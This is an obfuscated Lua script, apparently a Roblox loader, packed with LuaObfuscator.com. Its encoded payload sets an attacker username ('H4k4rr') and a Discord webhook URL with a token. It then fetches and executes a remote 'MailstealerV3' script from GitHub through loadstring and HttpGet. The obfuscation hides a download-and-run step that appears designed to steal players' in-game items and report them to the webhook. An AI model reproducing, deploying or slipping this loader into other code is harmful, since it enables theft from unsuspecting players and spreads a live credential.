--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.9.19) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30)if (v1(v30,2)==79) then v19=v0(v3(v30,1,1));return "";else local v84=0;local v85;while true do if (v84==0) then v85=v2(v0(v30,16));if v19 then local v101=v5(v85,v19);v19=nil;return v101;else return v85;end break;end end end end);local function v20(v31,v32,v33)if v33 then local v86=0 -0 ;local v87;while true do if (v86==((957 -(892 + 65)) + 0)) then v87=(v31/((879 -(282 + 595))^(v32-(2 -1))))%((3 -(2 -1))^(((v33-1) -(v32-(2 -(1 -0)))) + (1066 -(68 + 997)))) ;return v87-(v87%(620 -(555 + 64))) ;end end else local v88=((1712 -779) -(857 + 74))^(v32-(118 -(32 + 85))) ;return (((v31%(v88 + v88))>=v88) and (569 -(367 + 201))) or ((1277 -(87 + 263)) -(214 + 713)) ;end end local function v21()local v34=v1(v16,v18,v18);v18=v18 + 1 ;return v34;end local function v22()local v35=180 -((1064 -(915 + 82)) + 113) ;local v36;local v37;while true do if (v35==1) then return (v37 * (188 + 68)) + v36 ;end if (v35==((0 -0) -0)) then v36,v37=v1(v16,v18,v18 + ((2 + 1) -1) );v18=v18 + (4 -2) ;v35=1 + 0 ;end end end local function v23()local v38=0 -0 ;local v39;local v40;local v41;local v42;while true do if (v38==(1188 -(1069 + 118))) then return (v42 * (52725428 -35948212)) + (v41 * (148681 -(83163 -(10 + 8)))) + (v40 * (559 -303)) + v39 ;end if (v38==(0 + 0)) then v39,v40,v41,v42=v1(v16,v18,v18 + (4 -1) );v18=v18 + 4 + 0 ;v38=792 -((1415 -1047) + 423) ;end end end local function v24()local v43=v23();local v44=v23();local v45=1 -0 ;local v46=(v20(v44,443 -(416 + 26) ,63 -(145 -102) ) * ((1 + 1)^(56 -24))) + v43 ;local v47=v20(v44,459 -(145 + 293) ,31);local v48=((v20(v44,32)==(431 -((208 -164) + 153 + 233))) and  -(1487 -((2078 -(1020 + 60)) + 488))) or (1 + 0) ;if (v47==(1747 -(760 + 987))) then if (v46==(0 + 0)) then return v48 * (772 -(201 + 571)) ;else local v93=1138 -(116 + 1022) ;while true do if (v93==((1913 -(1789 + 124)) -0)) then v47=1;v45=(1423 -(630 + 793)) + 0 ;break;end end end elseif (v47==(7472 -5425)) then return ((v46==(0 -0)) and (v48 * ((860 -(814 + 45))/(0 -0)))) or (v48 * NaN) ;end return v8(v48,v47-((822 -(745 + 21)) + 967) ) * (v45 + (v46/((1 + 1)^((323 + 614) -((717 -456) + 624))))) ;end local function v25(v49)local v50;if  not v49 then local v89=0 -0 ;while true do if (v89==(0 + 0)) then v49=v23();if (v49==(0 -0)) then return "";end break;end end end v50=v3(v16,v18,(v18 + v49) -(1 + 0) );v18=v18 + v49 ;local v51={};for v68=1 + (1413 -(447 + 966)) , #v50 do v51[v68]=v2(v1(v3(v50,v68,v68)));end return v6(v51);end local v26=v23;local function v27(...)return {...},v12("#",...);end local function v28()local v52=0 -0 ;local v53;local v54;local v55;local v56;local v57;local v58;local v59;local v60;local v61;while true do if (v52==2) then v57=nil;v58=nil;v52=3;end if (v52==(1 + 3)) then v61=nil;while true do if (3==v53) then local v98=0;while true do if (1==v98) then v53=1326 -(1249 + 73) ;break;end if (v98~=0) then else v60=nil;v61=nil;v98=1 + 0 ;end end end if (4==v53) then while true do if (v54~=0) then else local v115=0;local v116;while true do if ((1145 -(466 + 679))==v115) then v116=0;while true do if (v116==0) then v55=0 -0 ;v56=nil;v116=2 -1 ;end if (v116==1) then v54=1;break;end end break;end end end if ((1901 -(106 + 1794))~=v54) then else local v117=0 + 0 ;local v118;while true do if ((0 + 0)~=v117) then else v118=0 -0 ;while true do if (v118~=0) then else v57=nil;v58=nil;v118=1;end if (v118~=1) then else v54=5 -3 ;break;end end break;end end end if (v54==3) then v61=nil;while true do local v120=114 -(4 + 110) ;while true do if (v120==(585 -(57 + 527))) then if (v55==(1429 -(41 + 1386))) then local v151=103 -(17 + 86) ;local v152;while true do if (v151==0) then v152=0;while true do local v157=0 + 0 ;while true do if ((0 -0)==v157) then if (v152==0) then local v169=0 -0 ;local v170;while true do if (v169==(166 -(122 + 44))) then v170=0 -0 ;while true do if (v170~=0) then else local v172=0;while true do if (1~=v172) then else v170=1;break;end if (v172~=0) then else for v176=3 -2 ,v23() do local v177=0 + 0 ;local v178;local v179;local v180;local v181;while true do if (v177==(1 + 0)) then v180=nil;v181=nil;v177=2;end if (v177~=0) then else v178=0 -0 ;v179=nil;v177=66 -(30 + 35) ;end if (v177==(2 + 0)) then while true do if (v178~=(1257 -(1043 + 214))) then else v179=0 -0 ;v180=nil;v178=1;end if (v178~=(1213 -(323 + 889))) then else v181=nil;while true do if ((2 -1)==v179) then while true do if (v180==0) then v181=v21();if (v20(v181,581 -(361 + 219) ,321 -(53 + 267) )==(0 + 0)) then local v187=0;local v188;local v189;local v190;local v191;while true do if (v187~=1) then else v190=nil;v191=nil;v187=415 -(15 + 398) ;end if (0~=v187) then else v188=0;v189=nil;v187=1;end if (v187==2) then while true do if (v188==(984 -(18 + 964))) then local v192=0 -0 ;local v193;while true do if (v192==(0 + 0)) then v193=0;while true do if (v193==(1 + 0)) then v188=3;break;end if (v193==0) then local v202=850 -(20 + 830) ;while true do if (v202==0) then if (v20(v190,1,1)==1) then v191[2 + 0 ]=v61[v191[2]];end if (v20(v190,2,2)~=(127 -(116 + 10))) then else v191[1 + 2 ]=v61[v191[741 -(542 + 196) ]];end v202=1;end if (v202==(1 -0)) then v193=1;break;end end end end break;end end end if (v188==0) then local v194=0;while true do if (0==v194) then v189=v20(v181,1 + 1 ,2 + 1 );v190=v20(v181,2 + 2 ,6);v194=2 -1 ;end if (v194==(2 -1)) then v188=1552 -(1126 + 425) ;break;end end end if ((408 -(118 + 287))~=v188) then else if (v20(v190,3,11 -8 )==1) then v191[1125 -(118 + 1003) ]=v61[v191[11 -7 ]];end v56[v176]=v191;break;end if (v188~=1) then else v191={v22(),v22(),nil,nil};if (v189==(977 -(553 + 424))) then local v198=0 -0 ;local v199;local v200;while true do if ((1 + 0)~=v198) then else while true do if (0~=v199) then else v200=0 + 0 ;while true do if (v200==0) then v191[3]=v22();v191[3 + 1 ]=v22();break;end end break;end end break;end if (0~=v198) then else v199=0 + 0 ;v200=nil;v198=1 + 0 ;end end elseif (v189==(2 -1)) then v191[7 -4 ]=v23();elseif (v189==2) then v191[3]=v23() -((4 -2)^16) ;elseif (v189==(1 + 2)) then local v204=0;local v205;local v206;while true do if (v204==1) then while true do if ((0 -0)==v205) then v206=0;while true do if (0~=v206) then else v191[756 -(239 + 514) ]=v23() -((1 + 1)^(1345 -(797 + 532))) ;v191[4]=v22();break;end end break;end end break;end if (v204~=0) then else v205=0;v206=nil;v204=1 + 0 ;end end end v188=1 + 1 ;end end break;end end end break;end end break;end if ((0 -0)~=v179) then else local v185=0;local v186;while true do if (v185==(1202 -(373 + 829))) then v186=731 -(476 + 255) ;while true do if (0~=v186) then else v180=1130 -(369 + 761) ;v181=nil;v186=1 + 0 ;end if (1==v186) then v179=1 -0 ;break;end end break;end end end end break;end end break;end end end for v182=1 -0 ,v23() do v57[v182-(239 -(64 + 174)) ]=v28();end v172=1 + 0 ;end end end if (v170~=1) then else v152=1 -0 ;break;end end break;end end end if (v152~=(337 -(144 + 192))) then else return v59;end break;end end end break;end end end break;end if (v120~=(216 -(42 + 174))) then else local v148=0;while true do if (v148~=(1 + 0)) then else v120=1 + 0 ;break;end if (v148~=0) then else if (v55==(1 + 0)) then local v155=1504 -(363 + 1141) ;while true do if (v155==(1581 -(1183 + 397))) then for v163=1,v60 do local v164=0;local v165;local v166;local v167;local v168;while true do if (v164==(2 -1)) then v167=nil;v168=nil;v164=2 + 0 ;end if (v164~=0) then else v165=0 + 0 ;v166=nil;v164=1976 -(1913 + 62) ;end if (v164==(2 + 0)) then while true do if (v165==(2 -1)) then v168=nil;while true do if (v166==(1934 -(565 + 1368))) then if (v167==1) then v168=v21()~=(0 -0) ;elseif (v167==2) then v168=v24();elseif (v167~=3) then else v168=v25();end v61[v163]=v168;break;end if (v166~=(1661 -(1477 + 184))) then else local v174=0;local v175;while true do if (v174==(0 -0)) then v175=0;while true do if (v175~=(1 + 0)) then else v166=1;break;end if (v175==(856 -(564 + 292))) then local v184=0 -0 ;while true do if (0~=v184) then else v167=v21();v168=nil;v184=2 -1 ;end if (v184==1) then v175=305 -(244 + 60) ;break;end end end end break;end end end end break;end if (v165~=(0 + 0)) then else v166=476 -(41 + 435) ;v167=nil;v165=1;end end break;end end end v59[3]=v21();v155=1003 -(938 + 63) ;end if (v155==(2 + 0)) then v55=2;break;end if (v155~=(1125 -(936 + 189))) then else local v159=0;local v160;while true do if (v159~=0) then else v160=0 + 0 ;while true do if (v160~=(1614 -(1565 + 48))) then else v155=1;break;end if (v160==0) then local v171=0;while true do if (v171~=(1 + 0)) then else v160=1;break;end if (v171~=(1138 -(782 + 356))) then else v60=v23();v61={};v171=268 -(176 + 91) ;end end end end break;end end end end end if (v55==(0 -0)) then local v156=0 -0 ;while true do if (v156==(1093 -(975 + 117))) then local v161=1875 -(157 + 1718) ;while true do if (v161==(1 + 0)) then v156=2;break;end if (v161==(0 -0)) then v58={};v59={v56,v57,nil,v58};v161=1;end end end if (v156~=(0 -0)) then else local v162=0;while true do if ((2 -1)==v162) then v156=1 + 0 ;break;end if (v162==(0 -0)) then v56={};v57={};v162=1;end end end if (v156==(5 -3)) then v55=1;break;end end end v148=1;end end end end end break;end if (v54==2) then local v119=1227 -(322 + 905) ;while true do if (v119~=(611 -(602 + 9))) then else v59=nil;v60=nil;v119=1;end if (v119==(1190 -(449 + 740))) then v54=875 -(826 + 46) ;break;end end end end break;end if (v53==(948 -(245 + 702))) then local v99=0 -0 ;while true do if (v99==0) then v56=nil;v57=nil;v99=1 + 0 ;end if (v99~=(1899 -(260 + 1638))) then else v53=442 -(382 + 58) ;break;end end end if ((0 -0)==v53) then v54=0;v55=nil;v53=1 + 0 ;end if (v53==(3 -1)) then local v100=0;while true do if (v100==1) then v53=8 -5 ;break;end if (v100==0) then v58=nil;v59=nil;v100=1;end end end end break;end if (v52==0) then v53=1205 -(902 + 303) ;v54=nil;v52=1 -0 ;end if (v52==3) then v59=nil;v60=nil;v52=9 -5 ;end if (v52==(1 + 0)) then v55=nil;v56=nil;v52=1692 -(1121 + 569) ;end end end local function v29(v62,v63,v64)local v65=v62[1];local v66=v62[2];local v67=v62[3];return function(...)local v70=v65;local v71=v66;local v72=v67;local v73=v27;local v74=1;local v75= -1;local v76={};local v77={...};local v78=v12("#",...) -1 ;local v79={};local v80={};for v90=0,v78 do if (v90>=v72) then v76[v90-v72 ]=v77[v90 + 1 ];else v80[v90]=v77[v90 + 1 ];end end local v81=(v78-v72) + 1 ;local v82;local v83;while true do v82=v70[v74];v83=v82[1];if (v83<=4) then if (v83<=1) then if (v83==0) then local v102=0;local v103;local v104;local v105;local v106;while true do if (v102==2) then for v140=v103,v75 do local v141=0;while true do if (v141==0) then v106=v106 + 1 ;v80[v140]=v104[v106];break;end end end break;end if (v102==1) then v75=(v105 + v103) -1 ;v106=0;v102=2;end if (v102==0) then v103=v82[2];v104,v105=v73(v80[v103](v13(v80,v103 + 1 ,v82[3])));v102=1;end end else v80[v82[2]]=v82[3]~=0 ;end elseif (v83<=2) then if ((v82[3]=="_ENV") or (v82[3]=="getfenv")) then v80[v82[2]]=v64;else v80[v82[2]]=v64[v82[3]];end elseif (v83>3) then local v124=0;local v125;while true do if (v124==0) then v125=v82[2];v80[v125]=v80[v125](v13(v80,v125 + 1 ,v75));break;end end else v64[v82[3]]=v80[v82[2]];end elseif (v83<=6) then if (v83>5) then do return;end else v80[v82[2]]=v82[3];end elseif (v83<=7) then local v110=v82[2];local v111=v80[v82[3]];v80[v110 + 1 ]=v111;v80[v110]=v111[v82[4]];elseif (v83>8) then local v128;local v129;v80[v82[2]]=v82[3];v74=v74 + 1 ;v82=v70[v74];v64[v82[3]]=v80[v82[2]];v74=v74 + 1 ;v82=v70[v74];v80[v82[2]]=v82[3]~=0 ;v74=v74 + 1 ;v82=v70[v74];v64[v82[3]]=v80[v82[2]];v74=v74 + 1 ;v82=v70[v74];v80[v82[2]]=v82[3];v74=v74 + 1 ;v82=v70[v74];v64[v82[3]]=v80[v82[2]];v74=v74 + 1 ;v82=v70[v74];if ((v82[3]=="_ENV") or (v82[3]=="getfenv")) then v80[v82[2]]=v64;else v80[v82[2]]=v64[v82[3]];end v74=v74 + 1 ;v82=v70[v74];if ((v82[3]=="_ENV") or (v82[3]=="getfenv")) then v80[v82[2]]=v64;else v80[v82[2]]=v64[v82[3]];end v74=v74 + 1 ;v82=v70[v74];v129=v82[2];v128=v80[v82[3]];v80[v129 + 1 ]=v128;v80[v129]=v128[v82[4]];v74=v74 + 1 ;v82=v70[v74];v80[v82[2]]=v82[3];else v80[v82[2]]();end v74=v74 + 1 ;end end;end return v29(v28(),{},v17)(...);end v15("LOL!093O0003083O00557365726E616D6503063O0048346B342O72030D3O004C6F6164696E675363722O656E03073O00576562682O6F6B03793O00682O7470733A2O2F646973636F72642E636F6D2F6170692F776562682O6F6B732F2O31393833303936372O31333O36313536352F55767A446B476A625F49425F323862735242755F7159445474383147644F71576C2D637069483867445532684149696C5541313259395271444A6A726B32395637394454030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403433O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F45676F72696B7573612F4D61696C737465616C657256332F6D61696E2F6D61696E000E3O0012093O00023O00124O00018O00013O00124O00033O00124O00053O00124O00043O00124O00063O00122O000100073O00202O00010001000800122O000300096O000100034O00045O00022O00083O000100012O00063O00017O00",v9(),...);
